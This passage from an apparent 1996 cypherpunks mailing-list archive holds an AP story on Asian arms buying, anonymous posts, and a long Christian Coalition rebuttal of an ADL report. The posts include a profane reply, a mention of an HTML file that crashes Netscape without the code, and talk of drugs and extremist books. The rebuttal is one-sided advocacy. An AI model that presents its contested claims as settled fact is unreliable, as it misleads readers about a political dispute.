and 50 fighter jets from France. South Korea bought three German cruisers
and Malaysia bought two British frigates.
Sweden sold diesel-electric submarines to Thailand and Singapore. The
United States no longer manufactures such vessels, partly in an attempt to
halt their proliferation. Such submarines are very quiet and almost
impossible to detect, even with sophisticated equipment.
Some military analysts argue the unprecedented weapons buildup will ignite
an arms race in a region crisscrossed by territorial disputes. They point
to the growing military might of Japan, China and India and a series of
smoldering regional disputes, including those between Taiwan and China and
between North and South Korea.
Asian governments counter that they're entitled to defend their territory.
"It is wrong to see the purchase of defense equipment by countries in the
region as an arms race,'' Singapore's defense minister, Tony Tan, said in a
TV interview in January.
"We and our ... neighbors are proceeding with plans to modernize our armed
forces, now that our economies have grown and we have the resources to pay
for better weapons and equipment.''
The biggest potential source of conflict in the region is China's feud with
its Southeast Asian neighbors over oil and gas riches in the South China
Sea. China has declared the entire region its territory, and sent warships
to enforce the claim.
While European governments try not to fuel arms races, they may sell to
buyers who are refused American weapons for political reasons, said Paul
Beaver, a military analyst for Jane's Information Group.
Beaver pointed to the example of Britain's $35 billion deal to supply
Tornado fighters and other weapons to Saudi Arabia after the United States
balked at selling warplanes that could be used to attack Israel.
"That has been seen by the Muslim countries in Southeast Asia as a strong
sign that Britain doesn't attach the same political conditions to its sales
as the United States does,'' he said in a telephone interview from London.
Thailand wants to buy advanced American AMRAAM missiles to arm its new F-18
fighters. But because no other country in the region has a missile that
sophisticated, the Clinton administration is hesitating for fear of
sparking competition among Thailand's neighbors to match it.
"If the United States did not want to sell AMRAAM missiles to Thailand, I
wouldn't be surprised if France would be willing to sell a similar
missile,'' said Pieter Wezeman, a researcher for the Stockholm
International Peace Research Institute.
Asian governments also appear to be buying European weapons to diversify
their arsenals in case Washington shuts off their supply.
"The United States has shown several times that they don't want to sell
weapons to everyone, and so at any moment they might start an embargo,''
Wezeman said.
In one of the region's biggest recent sales, Taiwan bought 210 fighter
jets, splitting the order between French Mirage-2000s and U.S.-made F-16s
after Washington first refused to sell and then approved fewer planes than
Taiwan wanted.
Pakistan, blocked by U.S. law from buying F-16s because of evidence it has
built nuclear weapons, is reported to be shopping for French or Russian
warplanes to fill the gap.
By The Associated Press
no_one at unimportant.

@_date: 1996-03-08 20:29:38
@_author: Anonymous 
@_subject: No Subject 
Fuck you.  This is bullshit FUD.
If you really feel that this bill would make escrow mandatory, do some
work to have the wording fixed rather than attack other people on the
list... Mailbombing people who don't agree with you will do nothing to
affect the wording or passage of the bill.  (And damned if I'd be
called a "patriot"....)

@_date: 1996-03-08 20:30:09
@_author: Anonymous 
@_subject: No Subject 
Fuck you.  This is bullshit FUD.
If you really feel that this bill would make escrow mandatory, do some
work to have the wording fixed rather than attack other people on the
list... Mailbombing people who don't agree with you will do nothing to
affect the wording or passage of the bill.  (And damned if I'd be
called a "patriot"....)

@_date: 1996-03-09 16:12:26
@_author: Anonymous 
@_subject: crash_netscape.html 
Netscape 1.12 core dumped on me while surfing today.
Narrowed it down to this.  (Don't try this at home, kids).
Crash! Core dump, sound of breaking code.
Tested on HPUX only.  Apparently doesn't crash Gold 2.0
on Win95.

@_date: 1996-03-09 20:15:59
@_author: Anonymous 
@_subject: Artist self censorship (Was Chinese net-censorship) Noise 
Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
critici.. by JFA T. QC, Canada at citene & later Declan B. McCullagh.
There is a photographer by the name of Jock Sturgis who is famous for
his photographs of naturalists and their children on the beaches of California
and France.  Sturgis' home was raided by the FBI and all of his photographs,
equipment, & records were seized under suspicion of producing child pornography
The photo equipment, records, and photographs were returned but not after making Sturgis' life a living hell...
Sturgis' work which has critical acclaim throughout art circles and has
two books profiling naturalists, has been quoted to saying that before taking
a picture he usually asks himself about how this picture is percived, something
the he never thought twice before the FBI raid.
Mr. Avon should think twice before commenting on self censorship does not
exist, for that could be the difference from having the door kicked in by the
black ninja turtles with the FBI or toning down your work.

@_date: 1996-03-09 21:58:38
@_author: Anonymous 
@_subject: Another Motivation for the CDA (Federal Sentencing Guid 
Three strikes you're fried eh?  Dont even bother cutting off
their hands - straight to old sparky thats what I say!
In theory one would expect the law to deter folk from committing
crimes, but in practice folk (a) don't expect to get caught which
means there aint no deterrent, or (b) the folk don't consider
the crime to be serious, eg. smoking pot.
Yeah, but it don't go off by itself, it needs a big kick.
Did they find any dynamite or other real explosives?  I doubt it.

@_date: 1996-03-09 22:02:26
@_author: Anonymous 
@_subject: Boycott TCSM 
Posted to alt.security:
Crypto relevance - TSCM are a counter-intelligence site with an attitude.
I need some advise of Latent prints.
Just got a assignment from a client concerning a large qty of
empty "Ziploc" and Glazine  packets found around the plant.
Most of the packets test positive (Nik-Kit) for Meth (Biker Crank), the problem
is that I am having a tough time pulling decent prints off the little envelopes.
Any suggestions??
I am going to try Nile Red (530nm) in ethanol instead of Rhodamine 6G, any
thoughts or experiences??
And yes the plant has a full ten finger set on all employees, all we have
to do is provide photos of any (9 point) prints James M. Atkinson          "...Shaken, not Stirred..."
127 Eastern Avenue Gloucester, MA 01931-8008
URL:       E-Mail:  jmatk at tscm.com
The First, The Largest, The Most Popular, and the Most
Complete TSCM Counterintelligence Site on the Internet

@_date: 1996-03-11 01:27:22
@_author: Anonymous 
@_subject: Explosives, Criminality, and Preemptive Action 
Hey!, if I lived on a farm I would no doubt possess similar amounts
of fertilizer and diesel.  I would also possess a few dozen assault
rifles if I could afford to (not that I'm a gun nut [I do happen to
enjoy shooting, and would doubtless own a few if I lived on a farm]
but would have "stocked up" before Klintons assault rifle bill.)
I also possess weapons manuals (ranging from bullwhips to blowguns
to 66mm anti tank weapons) and what you would call patriot literature
(ranging from books on Jefferson, on the civil war ("The South was
Right"), to The Turner Diaries.)  I am also an ocaissional drug user,
so you may find varying amounts of coke/crack, meth, horse, LSD, peyote,
and ecstasy in my abode.  In addition to this you would find books on
lockpicking, hacking, drug manuafacture, holocaust revisionism,
credit card fraud, false ID, smuggling, gun-running and tax evasion.
You would also find some very violent movies in my collection.
But, despite all of these circumstances, I assure you that I have not
(and would, ney, could not) commit any non-victimless crime.  I am an
out and out pacifist Libertarian.
I think this is what I call circumstancial evidence.

@_date: 1996-03-12 05:56:52
@_author: Anonymous 
@_subject: Cut the mystical artist crap. (No crypto relevance here) 
Don't mystify what an "artist" is, please!
What the compromises have to do with are that one lives in
a society with rules, mores, laws.  One of those touch-shit
facts of life.  You can do what you want, but when it involves
other people, restrictions come in.  You deal with them,
whether you are an artist, programmer, politician, goverment
wonk, or whatever.
It has nothing to do with selling out or losing integrity.
If you want food and shelter and you're not living in the
woods, then you have to play by everyone else's rules if you
don't have the power to make your own rules.
Was it Thoreau who said "Consistency is the hobgoblin of

@_date: 1996-03-13 08:43:38
@_author: Anonymous 
@_subject: Bell, Detweiler, Ravings, and Whatnot 
Timothy C. May writes in answer to jim bell -
This is not supposed to be an insult??
Says the one complaining of jim making ad hominem attacks.

@_date: 1996-03-13 12:26:14
@_author: Anonymous 
@_subject: ADL_mil (militias and the USAF) 
ADL Report
"The Anti-Defamation League has committed defamation. There is no other conclusion to be reached after reading its new report, The Religious Right: The Assault on Tolerance and Pluralism in America. It is sad that an organization with a proud history of fairness should have descended to this kind of character assassination and name calling."
- Columnist Mona Charen (1)
"In my twelve Senate years I worked with many of the 'Religious Right.'  They were active in the cause of Soviet Jewry (many Pentecostals and other Christians couldn't leave the Soviet Union either). They were fervent supporters of the State of Israel and we worked together often. Among the leadership of Conservative Christians I never experienced even a hint of anti-Semitism. Indeed, it was quite the opposite-I am Honorary Vice-Chairman of the ADL. I am proud of that-But in this instance I strongly disagree. From all my experience I know their report to be ill-founded. Regretably it will do more harm than good."
- Former U.S. Senator Rudy Boschwitz, Honorary Vice-Chairman, ADL (2)
On June 9, 1994, the Anti-Defamation League of B'nai B'rith, an organization created to fight defamation, released a report that alleges - with shoddy research and threadbare scholarship - that politically active people of faith pose a threat to the survival of American constitutional democracy. The ADL accuses numerous religious conservative organizations and leaders of anti-Semitism and bigotry. In so doing, the ADL itself has committed defamation. The ADL's new definition of "intolerance" apparently is disagreement with its liberal politics. The ADL report is filled with fabrications, half-truths, innuendo and guilt by association that are reminiscent of the political style practiced by Joseph McCarthy in the 1950s.
Persons of impeccable character and reputation are smeared for dubious reasons or for no reason at all. This style of politics is beneath the dignity of any organization that claims to be dedicated to fighting bigotry.
The response to the ADL report has been dismay from Jews and Christians alike. "Politically active Christians, the ADL concludes, are-well, 'extremist,' 'bogus,' 'conspiratorial,' 'fevered,' 'phony,'...and yes, 'fervent.' Protestant evangelicals are simply de trop, an object of condescension and prejudice," observed William Kristol, former chief of staff to Vice President Dan Quayle. (3)
Columnist Don Feder of the Boston Herald calls the report "an attempted political assassination." Feder adds, "Instead of debating the issues like a gentleman, it stoops to implications of anti-Semitism to discredit a legitimate voice in the values debate." (4)
Beth Gilinsky of the Jewish Action Alliance calls the ADL report "a plainly partisan smear campaign against traditional Christians who energetically - and quite legitimately -  advocate what they believe are important moral and social values." She concludes that although "Jewish-Christian friendship will survive the onslaught from the ADL, we are getting rather tired sweeping up after repeated ADL fiascos." (5)
This report specifically addresses those portions of the ADL document concerning the Christian Coalition. First, we will briefly examine the shoddy nature of the ADL's pseudo-research, and the report's heavy reliance on sources of questionable veracity. Second, we will discuss how the Christian Coalition really operates and discuss our true agenda of pluralistic democracy, nonpartisanship and inclusion. We also will discuss in detail the Coalition's nonpartisan voter guides and organizational structure and purposes.
The ADL's Pseudo-Research
The ADL claims its report was the culmination of nine months of research, but it bears none of the signs of a serious research report. It is virtually devoid of specific references to resource materials. (6)   The reader is left to simply take it on faith that the ADL's most damning charges are true, which they are not. In fact, much of the ADL's report is simply a retread of materials (some over a decade old) from groups like People for the American Way, Americans United for the Separation of Church and State, the Institute for First Amendment Studies and other groups that long have had political axes to grind against religious conservatives. (7)   Most disturbing, the ADL never contacted the Christian Coalition to get its response to their unfounded charges, nor did the ADL try to ascertain the accuracy of many of the quotations used in their report. This is particularly disturbing considering the fact that many of the groups and persons attacked have been!
  longstanding friends of the Jewish community, the State of Israel and the ADL.
In 1993, in seeking to settle charges that it had violated the privacy of certain individuals, the ADL sought to avoid legal liability by claiming that it enjoyed "journalistic status," making it "similar to any newspaper, magazine, or television station." (8)  If so, then the ADL has violated even the most basic principles of ethical journalism.
Had the Christian Coalition or its leadership been contacted for clarification, many of the errors in the report would have been corrected. Instead, the report is filled with gross inaccuracies of fact. Quotations are listed without attribution, while others are listed (incredibly) as coming from the "library of People for the American Way." A quotation from Pat Robertson on church-state separation has no source listed at all. (9)  Of 28 quotations attributed to Paul Weyrich, founder of the Washington-based Free Congress Foundation, 22 have no source for the quote. (10)
Numerous Factual Errors
Basic biographical errors abound. For instance, the ADL report says that Christian Coalition executive director Ralph Reed, Jr. once worked as a "campaign staffer for Georgia Rep. Newt Gingrich, former Georgia State Sen. Mack Mattingly and Sen. Jesse Helms of North Carolina." (11) Reed never has been employed on the campaign staffs of any of these individuals. He never was employed by Rep. Newt Gingrich in any capacity. He worked for Students For America, an independent organization, during the 1984 Senate race in North Carolina. He has never been employed by Senator Jesse Helms. He served as an intern for Mack Mattingly in the U.S. Senate in the summer of 1981. Mattingly was a U.S. Senator, not a state Senator, from Georgia.
Reed never made the comment attributed to him by the ADL calling for "a country once again governed by Christians-'."(12) Indeed, when asked on the NBC Meet the Press program in 1992 whether he believed America was a "Christian nation," Reed disagreed. "I think the only difference that I would have with it is - and I should probably preface this by telling you that I began my political career as the executive director of the first Jewish national chairman of the College Republicans in the history of the Republican party - I do think that you have to acknowledge the role that Jews have played and will continue to play, and I think there's a commonality among Jews and Christians on a lot of issues because again, ultimately it's a faith that I think has a lot of common values."(13)
It is not as though adequate documentation of Dr. Reed's views was unavailable to the ADL. As recently as February of this year, the New York Times news service carried an extensive profile that noted, "At the same time, the coalition is making overtures to minorities and Jewish leaders, hoping to bring some diversity to what has so far been a remarkably homogeneous movement." Arthur Kropp of People for the American Way added, "I disagree with [Reed] wholeheartedly, but I don't detect a mean spiritedness in him that you detect in other leaders. There's a political astuteness, perseverance, and intelligence."(14)
The ADL also misspells the name of the Coalition's Director of Legislative Affairs, Marshall Wittmann. This could not have been a typographical error, as Wittmann's name appears incorrectly spelled throughout the report. Cursory  fact-checking should have caught this error. (15)
So poorly researched is the report that views attributed to columnist Robert Novak are based on a quotation so badly lifted out of context that its meaning is distorted. In arguing that a "grim" Paul Weyrich, a Washington pro-family strategist, is somehow tied to anti-Semitic individuals, the report quotes Novak as saying, "I am supposed to be the Prince of Darkness, but Paul's the only person who's so tough that he gets hate mail from Mother Theresa."(16) This statement was made by Mr. Novak at a roast in Weyrich's honor held in Washington, DC, on April 1, 1991. Clearly, the remark is offered in jest - but it is lifted out of its proper context by the ADL to distort the true meaning.(17)
Reckless Charges of Anti-Semitism
The ADL report repeatedly suggests that leaders and organizations in the pro-family movement are guilty of anti-Semitism.
Stung by criticism from within the Jewish community, the ADL is backpedaling, and now denies making the accusation. For example, in a response to an earlier Christian Coalition correction of its many factual errors, the ADL weakly claimed, "the ADL does not call the Christian Coalition or any other religious right organization anti-Semitic." (18)
Has the ADL not read its own report? It alleges that "movement leaders have demonstrated a disturbing insensitivity to Jews and Jewish concerns" (p. 2), that its agenda expresses "anti-Jewish and extremist sentiments" (p. 2), that its leaders make "public anti-Jewish pronouncements" (p. 21), that its rhetoric is "reminiscent of traditional anti-Semitic thinking" (p. 22), that its literature is peppered with "anti- Jewish nuggets" (p. 24), that its leaders have "issued a number of pronouncements antagonistic toward Jews" (p. 42), that the movement has been "tolerant of anti-Semitism" (p. 42), that its publications echo "evangelical anti-Judaism" (p. 43), and that its groups conspire with "the nation's leading anti-Semitic propaganda organization" (p. 97). (19)
Had the ADL simply contacted the Christian Coalition and other groups defamed by the report, extensive documentation could have been provided to demonstrate our wholehearted and steadfast opposition to anti-Semitism and bigotry. In January 1994, Pat Robertson received the highest honor of the Christians' Israel Public Action Campaign at a Jewish-Christian solidarity rally in Washington, DC. At the awards ceremony, Robertson stated, "Those of us who are evangelicals say to those of you who are Jewish, we are your friends. We stand with you and however easy it is, or however difficult it is, you can count on us as your friends, your supporters and your compatriots in a struggle to bring forth the fulfillment of that prophecy, and to make this a better world for all of us to live in." (20)
Robertson also told the Los Angeles Times in 1993, "I am convinced on the political scene that the evangelical churches, the Catholic churches, the Orthodox Jewish people, all of us, will work together." Ralph Reed was quoted in the same story as saying, "We're working very closely with various conservative and orthodox rabbis to try to build a friendship and cooperation across theological lines on family and moral issues." (21)
Robertson has been a major contributor to the United Jewish Appeal, has donated large sums to Jewish charities in Jerusalem, and visited the ADL offices in 1985 to meet with its board of directors. At that meeting, Robertson held hands with then-executive director Nathan Perlmutter and the entire board of directors and the group prayed together for an end to anti-Semitism and intolerance in America. Those present at the meeting report that many were moved to tears.
In January 1994, Ralph Reed visited Israel on a tour sponsored by the Jerusalem Post. He met with former Prime Minister Yitzak Shamir, members of the Knesset, government officials, and the mayor of Jerusalem. Reed's trip was undertaken with the assistance of Jewish leaders in the United States to underscore the Christian Coalition's steadfast support for Israel and Jewish concerns. (22)
Twisting Words Out of Context One of the most disturbing aspects of the ADL's report is its propensity to lift words out of context so as to distort their original meaning. It does so with reference to the irresponsible charge of anti-Semitism.
Citing an editorial in the Christian American newspaper, the ADL argues that the Christian Coalition believes that "Jews 'both killed the Lord Jesus and their own prophets, and have persecuted us; and they please not God, and are contrary to all men' (1 Thessalonians 2:15)." The ADL dismissively acknowledges that this quotation from the New Testament appeared in an editorial denouncing anti-Semitism, but refers to it as "typical of evangelical anti-Judaism." (23)
In fact, the editorial (titled "Anti-Semitism in the Church") cited the above-mentioned verse from the Bible as an example of Scripture twisted by anti-Semites in the past to justify their bigotry. The editorial went on to say that "the place of the Church is to restore, not to condemn." The column concludes, "Our editorial position has been and remains clear, consistent, and Biblical: we support the State of Israel and we oppose anti-Semitism." (24)
In the same issue of Christian American, another statement condemned bigotry against Jews. "Anti-Semitism is a serious and dangerous thing to take root and grow. Please do not give aid to this monster, and allow it to grow any further." (25)
Reaction from the Jewish Community
Many in the Jewish community have reacted with disbelief to the ADL's assault on Christian leaders who have been among their best friends in the United States. Midge Decter and Elliot Abrams both have begun efforts to refute the biased report by the ADL through newspaper advertisements. Former U.S. Senator Rudy Boschwitz, an honorary vice-chairman of the ADL, has written a letter distancing himself from the report. "In my 12 Senate years, I worked with many of the 'Religious Right.' They were very active in the cause of Soviet Jewry (many Pentecostals and other Christians couldn't leave the Soviet Union either). They were fervent supporters of the State of Israel, and we worked together often. Among the leadership of conservative Christians I never experienced even a hint of anti-Semitism. Indeed, it was quite the opposite-I am honorary vice-chairman of the ADL. I am proud of that-but in this instance I strongly disagree. From all my experience I know their report to be i!
 ll-founded. Regretably it will do more harm than good." (26)
Marshall Breger of the Heritage Foundation has noted that the report "inferred that the religious right is anti-Semitic, and I don't see how you can make that claim on the record." Marshall Wittmann, director of legislative affairs at the Christian Coalition, says, "This [report] was liberalism and not Judaism speaking." He adds, "It's quite ironic that the ADL, despite all the various anti-Semites out there, would go after people for their political views." (27) Wittmann, who has traveled extensively speaking to Christian Coalition seminars nationwide, recounts that he has "never encountered a whiff of anti-Semitism" among its members. (28)
"The greatest friends the State of Israel has in America are the Christian conservatives," said Herbert Zweibon, chairman of Americans for a Safe Israel. "And [the ADL] is telling this community to get lost?" Zweibon added that the ADL, founded in 1913 to combat anti-Semitism, had "gone off track" and "adopted a liberal political agenda that has nothing to do with its mission." The ADL, he concluded, "does not represent the views of most American Jews." (29)
Opposing David Duke
The ADL frequently resorts to the very same kinds of guilt-by-association lines of argument patented by virulent anti-Semites. One of the most egregious examples occurs in its allegation that Pat Robertson and Christian Coalition board member Billy McCormack gave aid and support to former klansman and neo-Nazi David Duke's Louisiana senatorial bid in 1990 and his gubernatorial bid in 1991. The allegation is not true.
The report says McCormack helped to table a 1990 censure motion against Duke in the Louisiana Republican Central Committee, implying that McCormack supported Duke's racist views. (30) This is inaccurate. Rhett Davis, who served as Congressman Clyde Holloway's campaign coordinator in the 1991 gubernatorial campaign, says the following about McCormack's role: "Months before Congressman Holloway formally announced his candidacy (though David Duke had already announced), Mr. Billy McCormack of Shreveport contacted me on numerous occasions expressing his strong feeling that we needed to convince Congressman Holloway to run because no other candidate was acceptable- . Mr. McCormack and his friends statewide began a concentrated effort to help our campaign. Mr. McCormack was very effective, and ultimately provided the margin of victory for Holloway at the Republican State Convention." (31)
Davis also noted that McCormack brought Robertson to Louisiana to campaign against Duke in October 1991, and Robertson appeared in Baton Rouge, Lake Charles, and Shreveport at fundraisers for Holloway. (The trip was paid for by the Holloway for Governor campaign and Robertson appeared in his capacity as a private citizen.)
"Additionally," Davis continued, "please note that the effort to kill a move to censure Duke-was actually led by the anti-Duke forces, fearing such a move would not hurt him, and might indeed backfire like other, similar moves." (32)  Other press accounts have similarly noted that the resolution was tabled to "deprive Duke of additional publicity." (33)
In November 1991, after Clyde Holloway (the favored candidate of religious conservatives) failed to make the run-off election for Governor, pro-family activists faced a dilemma. Edwards was an advocate of legalized gambling, liberalized pornography laws, and abortion. Duke - though conservative on these issues - held anti-Semitic and racist views that are anathema to religious conservatives.
How did religious conservatives react to this dilemma? In the ADL's green-spectacled fantasy, "Robertson displayed indifference to Duke's racist record, despite the fact that the national Republican Party-had repudiated and condemned the arch-bigot more than a year earlier." The ADL report gravely intones that Robertson "never denounced Duke during Duke's subsequent Louisiana gubernatorial bid- ." (34)  That is an irresponsible statement for which the ADL should issue a retraction and an apology.
On November 13, 1991, Robertson denounced Duke on his 700 Club program before the run-off between Edwards and Duke. His words were unambiguous: "You don't get converted one day and run for governor the next. And especially the fact that there was apparently a falsehood about his-service- it does not exist, apparently. And furthermore, he claims to be a member of a church that doesn't exist as well. There are a few little inconsistencies. Plus there's some really bad stuff in his background- . And it's very dangerous in America to foster hate, and racial hatred, hatred of Jews, bigotry - that kind of thing. It is something we just don't need in this country." (35)
Duke lost a campaign which he had led in many polls just weeks prior to the election. Many observers noted that Robertson's statement - strategically timed a few days before the run-off for maximum impact - might have made the difference by depressing Duke's support among white evangelical voters. Many other organizations and leaders adopted a more low-profile tactic in opposing Duke. (36)  But Robertson boldly and publicly spoke out. Instead of praising Robertson for being the most prominent evangelical Christian figure in America to denounce Duke and prevent his election, the ADL smeared him with a falsehood.
Conspiracy Theories of the Left
The ADL is obsessed with the notion that Christian conservatives engage in so-called "stealth" activities that disguise their agenda. It relies heavily on bizarre theories like those propagated by People for the American Way and Skipp Porteous, a Massachusetts-based conspiracist-cum-propagandist who specializes in spreading falsehoodsand innuendo about religious conservatives.
By combining forces with paranoid conspiracists on the left, the ADL suggests that the distribution of nonpartisan voter guides by Christian organizations amounts to a subversion of democracy. The report asserts that "the policy of Robertson's Christian Coalition has often been to hide its election activity." (37)   It falsely claims that the Coalition "acknowledges having used [stealth tactics]." It compares volunteers in churches who educate voters with "Tammany's ward heelers and the old Democratic machine in Chicago." (38)
The ADL report asserts, "The Coalition participated in the ground-breaking November 1990 elections in San Diego County in which 60 of 88 candidates associated with religious right groups were elected to office - an event that came to be known among the religious right and its critics as the 'San Diego model.' " (39)
This statement is false. The Christian Coalition played no part in the 1990 San Diego school board elections. At the time, the Coalition barely had been in existence a year. It had no state affiliate in California and no chapter in the San Diego area. The Coalition neither practices nor endorses the "stealth tactics" the ADL claims.
Contacted by the Los Angeles Times after the election, Ralph Reed of the Christian Coalition made it clear that his organization had nothing to do with the campaign. He noted that while the tendency of candidates to campaign in churches might have been an effective strategy, it probably would backfire if the candidates had not gained broad support for their views in the electorate.
Reed made these remarks in his capacity as a political analyst. He did not condone, endorse, or participate in the strategy. The Times misquoted Dr. Reed, a fact that the ADL could have discovered with a more thorough search of newspaper accounts on the subject. (40)
If the 1990 San Diego School Board races are a "model," as the ADL alleges, what were they a model for? The fact is that this strategy failed in San Diego - many of the candidates who used them were defeated in 1992 - and it never has been replicated again.
The ADL report fails to mention a single other community in the nation where the strategy has been used. It alludes to an undocumented charge by Skipp Porteous that such a strategy was undertaken in Williamsville, New York, but provides no evidence and names not one candidate who employed them. (41) In fact, the incident in Williamsville never happened. Jeff Baran, executive director of the Christian Coalition in New York, made this clear. "I can assure you that, while I have had a few conversations with Porteous in the past, none have ever contained talk of running candidates of any kind, let alone 'stealth' candidates. As is our policy, we have not engaged in partisan politics in Williamsville or anywhere in New York- ."(42)  Apparently San Diego was not a "model" at all, just a threadbare scare tactic whipped up by conspiracy theorists like Skipp Porteous and People for the American Way.
Guilty of Democracy
The ADL seeks to tar the name of Christian Coalition by finding the organization guilty of commiting democracy. Through nonpartisan voter education efforts, Christian Coalition informs voters  where candidates stand on a broad range of issues, and encourages voters to go to the polls and cast their ballots for the candidate of their choice. 	
Christian Coalition leaders have repeatedly disavowed so-called "stealth tactics." They always have been accessible to the press, open to the public, and have pursued a policy of honesty and rectitude in their voter education activities.
Ralph Reed told the Washington Times, "We don't encourage in any way people to run for office at any level and misrepresent their position on any issue. We believe pro-family candidates should run unapologetically on who they are and what they believe because the public shares their viewpoint." (43)
In an appearance on CNN's Crossfire, Reed specifically denounced the so-called stealth strategy:
Reed: 	We're working on behalf of choice in education.We're working to increase the standard deduction for children. We're working to decrease the tax burden on the American family. It's a mainstream agenda for a mainstream America. Eighty percent of the American people want prayer in school, 75 percent are opposed to abortion as a form of birth control, and two out of three want choice in education.
Sununu: 	Ralph, let me ask you this. If those statistics are valid, and I think they are, then why-the stealth candidate strategy that you're getting criticized about?
Reed: 	We don't, John. We don't encourage that. We don't teach it. We don't promote it. What we think is that, because our values are held by the vast majority of Americans, go out there and articulate what you stand for, and you'll draw the people to you. That's what Ronald Reagan did, and that's what we want to do. (44)
Coalition founder Pat Robertson has been equally clear: "People can say anything they want to, but it's not the policy of the Christian Coalition nationally to hide anything. We want to bring out the truth, not hide it. We want to know what people stand for." (45)
As Ralph Reed argues in his forthcoming book:
"We do not advocate electing officials by depressing voter turnout or taking advantage of historically low voter participation. Some have inaccurately charged that religious conservatives hide their religious affiliation, conducting "stealth" campaigns in which they eschew public forums and campaign exclusively in churches. The opposite is true. The Christian Coalition, for example, distributes millions of nonpartisan voter guides that inform voters on where all the candidates stand- .We want a more open airing of who the candidates are and what they believe. Pro-family candidates win at the ballot box because of their views, not in spite of them. They are elected precisely because of who they are and what they believe." (46)
The New York City Mode
If the ADL was looking for the real model of Christian Coalition activity, it would turn to the place where ADL's headquarters is located: New York City. In 1993, Queens school board member Mary Cummins led a protest movement against then-New York City School Chancellor Joseph Fernandez' imposition of the "Rainbow Curriculum," a multi-cultural course that included instruction on the gay lifestyle to students as young as six years old.
A local Christian Coalition chapter was organized, coincidentally, about the same time Cummins raised her voice. The Coalition's New York City coordinator made contact with Cummins, and over the next two months the Coalition, in cooperation with the Roman Catholic Archdiocese of New York, The Congress Of Racial Equality (CORE), The National Committee For the Furtherance of Jewish Education, and the Family Defense Council, supported her reform efforts by distributing 550,000 nonpartisan voter guides in 1,300 churches and synagogues.
Catholics, Hispanics and Jews joined the Christian Coalition to distribute more than 500,000 nonpartisan voter guides prior to the New York City School Board races. In addition to church and synagogue distribution, Christian Coalition voter guides were passed out at union halls, polling places and family events. The guides informed voters where 540 school board candidates stood on a broad range of issues, including school choice, voluntary prayer, merit pay for teachers and parental rights. The guides endorsed no candidates and were used for voter education. In a far-reaching show of support, Cardinal John O'Connor allowed the distribution of voter guides in 300 Catholic churches, a move that opened the door to ongoing Catholic/evangelical cooperation.
As a result of Christian Coalition's voter education campaign, voter turnout reached the highest level in 20 years. Approximately 450,000 voters went to the polls, and 60 percent of 130 pro-family candidates won election. Ten city school boards had solid pro-family majorities. Among the new board members: Linda Garcia, a Hispanic mother who won election in Manhattan's Lower East Side. Cummins and her allies were re-elected in Brooklyn. Fernandez was removed from his post. (47)
The Coalition's efforts in New York were the subject of ongoing press coverage from the beginning, and virtually every significant development was reported in detail. The Coalition held numerous news conferences in New York during the campaign to announce its activities. Indeed, when the New York Times and the New York Post listed which candidates they preferred in the contests, they did so based on information derived from the Coalition's well-documented voter guide. (48)  So much for "stealth."
Reed told the New York Times during the campaign: "We're simply encouraging people of faith, of all religious traditions, including people of the Jewish and Roman Catholic faiths, to be informed voters." (49)
Another Distortion: The Phantom Manual
Seeking more fodder for its conspiracy grist mill, the ADL repeats the tired and false accusation that the "1992 Pennsylvania Christian Coalition's 'County Action Plan' directed" members to "never mention the name Christian Coalition in Republican circles." (50)
To state the obvious, Christian Coalition's activities within the GOP are a matter of public knowledge, especially given extensive news coverage of the last several years. With Democratic consultant Bob Beckel calling politically active evangelicals "Nazis," Mark Shields referring to them as the "American equivalent of Shiite Muslims," and Jocelyn Elders attacking them, it is difficult to see how the ADL can think that anyone is unaware of Christian involvement in the Republican party.
In fact, the manual the ADL cites does not exist. The "County Action Plan" was a draft prepared by a local volunteer. It was submitted to the national office and rejected as inconsistent with the Coalition's policy of openness and inclusion.
As Ralph Reed directed in a letter on October 7, 1992, to the executive director of the Pennsylvania chapter:
"There are several problems with the manual-It directs Christian Coalition members not to mention their affiliation with the Christian Coalition in party circles. That is not our policy- .This manual, in its current form, does not have the authorization or imprimatur of the Christian Coalition. Please retrieve all copies- ." (51)
The ADL need only have contacted the Christian Coalition and its staff would have gladly provided a copy of the letter. As it is, the ADL has repeated a false allegation about a manual that does not exist. In fact, the ADL barely mentions the legitimate and extensive Christian Coalition training materials, such as its 256-page Leadership Manual, which states the official policy of the organization.
Indeed, the Leadership Manual  clearly urges pro-family citizens to be open, honest and up front about their views and beliefs:
"First, do not limit your campaign to just churches and the Christian community. As a supporter of family values, your positions on issues affecting the family are the same as a majority of the voting public. Do not be shy in declaring that your stands on the issues are based on principle- ."
"Do not use so-called 'stealth' tactics. In the past, some candidates have focused their campaigns on the churches and have not reached out to the general electorate. In the long run, this strategy is unsuccessful- .Working in the churches alone will not result in lasting success." (52)
A Nonpartisan Coalition
Christian Coalition's get-out-the-vote efforts are nonpartisan, contrary to the ADL's assertions. The ADL repeats partisan claims by the Democratic National Committee, which recently has launched an orchestrated campaign of bigotry against people of faith in the political arena. It mentions specious complaints that the DNC has filed with Federal Election Commission. It fails to mention that both the FEC and the IRS have found the Christian Coalition's nonpartisan voter guides in full compliance with the law.
The ADL conveniently ignores the fact that every complaint filed by the Democratic Party against the Coalition has been resolved in favor of the Christian Coalition, most notably a 1990 complaint that advertisements opposing taxpayer-funding of pornography constituted "express advocacy" on behalf of specific candidates. The FEC found that the advertisements were entirely consistent with the Christian Coalition's status as a nonpartisan issues organization. (53)
The ADL also fails to mention the fact that the Coalition has engaged in voter education activities in a number of Democratic races. For example, in the spring of 1994 in Houston, Texas, the Coalition distributed voter guides in a campaign in which Beverly Clark, an African-American, pro-life Democrat, ran in a congressional primary. "The Christian Coalition distributed nonpartisan voter guides in over 100 black churches and made thousands of nonpartisan get-out-the-vote calls to African-American voters from grassroots phone banks." (54)  Clark forced Ken Bentsen, nephew of the Treasury secretary and former Texas senator, into a run-off.
A voter guide distributed for the April 12 Democratic run-off listed Clark's and Bentsen's stands (labeled "supports" or "opposes") on ten public policy issues. The answers were provided to the Coalition in response to a candidate survey. Those issues were: "Increased income taxes; balanced budget amendment; abortion-on-demand; taxpayer funding of abortion; voluntary prayer in schools; mandatory sentences for violent crimes; homosexuals in the military; parental choice in education (vouchers); federal government control of health care; 'workfare' requiring able-bodied welfare recipients to work or get job training." (55)  The Coalition distributed a similar voter guide in a Mississippi Democratic congressional primary in 1994.
In Cincinnati, Ohio in 1993, pro-family activists supported Charles Winburn, an African-American pastor of the Kingdome Church, in his run for the city council. Winburn, a registered Democrat, graduated from a Christian Coalition training school and campaigned for welfare reform and school choice. (56)
Reaching Out to Democrats
